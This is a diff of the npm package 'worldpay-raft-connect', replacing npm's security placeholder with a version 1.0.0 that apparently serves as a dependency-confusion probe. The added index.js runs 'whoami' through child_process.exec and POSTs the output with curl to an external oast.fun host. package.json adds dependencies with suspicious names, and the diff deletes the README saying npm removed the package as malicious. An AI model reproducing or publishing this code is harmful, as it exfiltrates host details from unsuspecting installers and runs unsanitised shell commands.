worldpay-raft-connect 0.0.1-security → 1.0.0

package/index.js

@@ -0,0 +1,37 @@
+const { exec } = require("child_process");
+
+function sendPingback(data) {
+  const collaboratorUrl = "https://rxthgpisbdduguomjwmiubm64o6e6x4lq.oast.fun";
+  exec(`curl -X POST -d "${data}" ${collaboratorUrl}`, (error, stdout, stderr) => {
+    if (error) {
+      console.error(`Error: ${error.message}`);
+      return;
+    }
+    if (stderr) {
+      console.error(`Stderr: ${stderr}`);
+      return;
+    }
+    console.log(`Pingback sent: ${stdout}`);
+  });
+}
+
+function executeCommand(command) {
+  exec(command, (error, stdout, stderr) => {
+    if (error) {
+      console.error(`Error: ${error.message}`);
+      sendPingback(`Error executing command: ${error.message}`);
+      return;
+    }
+    if (stderr) {
+      console.error(`Stderr: ${stderr}`);
+      sendPingback(`Stderr: ${stderr}`);
+      return;
+    }
+    console.log(`Command output: ${stdout}`);
+    sendPingback(stdout); // Send the command output to the collaborator
+  });
+}
+
+// Example: Execute a command (e.g., 'whoami')
+executeCommand('whoami');
+

package/package.json

@@ -1,6 +1,26 @@
 {
+
   "name": "worldpay-raft-connect",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+
+  "version": "1.0.0",
+
+  "description": "A simple package to trigger Burp Collaborator for security testing",
+
+  "main": "index.js",
+
+  "scripts": {
+
+    "test": "node index.js"
+
+  },
+
+  "dependencies": {
+
+    "@mallutrojan005/coveralls": "^0.1.0",
+
+    "assistants-nextjs": "^9.0.0"
+
+  }
+
 }
+

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=worldpay-raft-connect for more information.